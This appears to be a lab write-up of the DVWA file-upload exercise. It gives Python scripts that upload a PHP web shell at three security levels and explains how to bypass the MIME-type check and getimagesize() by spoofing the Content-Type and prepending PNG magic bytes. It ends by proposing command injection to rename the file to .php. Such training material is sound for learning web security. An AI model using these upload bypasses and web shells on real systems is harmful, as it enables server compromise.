At this level (security=low) there is no validation at all, so the shell is uploaded as-is:
import re
import requests

def main():
    # Session cookie and security level of the DVWA instance used on this page
    headers = {
        'Cookie': 'PHPSESSID=jb7d875vs8rlusttoadfi1m4l5; security=low'
    }
    url = 'http://192.168.67.22/dvwa/vulnerabilities/upload/'
    data = {
        'Upload': 'Upload'
    }
    # Low level: the shell goes up unchanged, under its real name, with a non-image content type
    with open('wso.php', 'rb') as shell:
        files = [('uploaded', ('wso.php', shell, 'application/octet-stream'))]
        res = requests.post(url, data=data, files=files, headers=headers)
    # DVWA wraps the upload result in a <pre> block; print just that message
    m = re.search(r'<pre>(.*?)</pre>', res.text, re.M | re.S)
    if m:
        print(m.group(1))

if __name__ == '__main__':
    main()
The response is:
../../hackable/uploads/wso.php succesfully uploaded!
Looking at the source (security=medium), the code checks the MIME type and the file size:
if( ( $uploaded_type == "image/jpeg" || $uploaded_type == "image/png" ) && ( $uploaded_size < 100000 ) )
Bypass: just change the MIME type. $uploaded_type comes from $_FILES['uploaded']['type'], which is nothing more than the Content-Type the client sent for the multipart part, so the attacker sets it freely and the file contents are never inspected.
import re
import requests

def main():
    headers = {
        'Cookie': 'PHPSESSID=jb7d875vs8rlusttoadfi1m4l5; security=medium'
    }
    url = 'http://192.168.67.22/dvwa/vulnerabilities/upload/'
    data = {
        'Upload': 'Upload'
    }
    # Medium level: same shell and file name, only the part's Content-Type is spoofed to image/jpeg
    with open('wso.php', 'rb') as shell:
        files = [('uploaded', ('wso.php', shell, 'image/jpeg'))]
        res = requests.post(url, data=data, files=files, headers=headers)
    # DVWA wraps the upload result in a <pre> block; print just that message
    m = re.search(r'<pre>(.*?)</pre>', res.text, re.M | re.S)
    if m:
        print(m.group(1))

if __name__ == '__main__':
    main()
Looking at the source (security=high), the code now checks the extension and the file size, and calls getimagesize() on the temporary file, which only succeeds if the content starts like an image:
// Is it an image?
if( ( strtolower( $uploaded_ext ) == "jpg" || strtolower( $uploaded_ext ) == "jpeg" || strtolower( $uploaded_ext ) == "png" ) && ( $uploaded_size < 100000 ) && getimagesize( $uploaded_tmp ) )
Bypass: rename the shell to .jpg/.jpeg/.png, and insert a JPG/PNG/GIF header at the start of the file so getimagesize() accepts it. getimagesize() identifies the format from the leading magic bytes and then reads the dimensions from what follows, so it does not care that PHP code comes after the header. Here the PNG signature (the first 8 bytes of every PNG file) is used:
89 50 4E 47 0D 0A 1A 0A
Note: do this with a binary/hex editor.
import re
import requests

def main():
    headers = {
        'Cookie': 'PHPSESSID=jb7d875vs8rlusttoadfi1m4l5; security=high'
    }
    url = 'http://192.168.67.22/dvwa/vulnerabilities/upload/'
    data = {
        'Upload': 'Upload'
    }
    # High level: dog.php is the shell with the 8-byte PNG signature prepended;
    # it is uploaded under the name wso.png so the extension check passes
    with open('dog.php', 'rb') as shell:
        files = [('uploaded', ('wso.png', shell, 'application/octet-stream'))]
        res = requests.post(url, data=data, files=files, headers=headers)
    # DVWA wraps the upload result in a <pre> block; print just that message
    m = re.search(r'<pre>(.*?)</pre>', res.text, re.M | re.S)
    if m:
        print(m.group(1))

if __name__ == '__main__':
    main()
After the file is uploaded, use the command injection vulnerability from earlier and the mv command to change its extension to php. [This is a sticking point; I feel there should be a way that does not need command injection, and would welcome advice from anyone passing by.]